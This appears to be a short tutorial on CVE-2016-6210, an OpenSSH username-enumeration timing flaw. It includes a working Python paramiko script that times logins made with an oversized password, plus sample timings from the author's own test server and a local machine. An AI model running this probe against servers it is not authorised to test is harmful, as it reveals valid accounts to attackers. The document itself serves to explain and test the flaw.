Listing users via the CVE-2016-6210 vulerability

So when OpenSSH checks a user’s password, it will use a hashing function like SHA256 / SHA512 to hash the password and check it against the user’s saved hashed password.

However, OpenSSH 7.2p2 and before had a vulerability where it would use Blowfish for users that don’t exist, and SHA256 / SHA512 for real users. The two hashes compute data at different speeds, so it’s easy to tell a real one from a fake one. This bug shows some other info for it.

If SELinux is enabled, OpenSSH will use the helper binary “unix_chkpwd” which mitigates this flaw.

Test Script

Here is a python script from this article. Setting the <SET SERVER HERE> to whatever server we want to test, we can see if the server is vulerable:

import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.time()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
  ssh.connect('<SET SERVER HERE>', username=user,
  password=p)
except:
  endtime=time.time()
total=endtime-starttime
print(total)

Testing it

So, first let’s test a remote server of mine that I setup just for this. I change the above ‘' to my server's address, say '10.1.1.5', and save it.

Let’s test a real user (you can also user root as the user, if it’s enabled):

user: realuser
12.5089271069

Then let’s test a fake one:

user: iambatman
2.69300603867

As you can see, 12.5 is greater than 2.6, so yes the server is vulerable.

In other cases, this can be done on a local system.

Fake user:

nothere
0.0369758605957

Real user:

MrReal
0.0134921073914

As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.